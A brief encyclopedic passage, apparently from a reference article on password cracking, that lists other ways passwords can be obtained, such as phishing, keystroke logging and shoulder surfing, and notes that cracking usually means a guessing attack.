It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.

However, cracking usually designates a guessing attack.
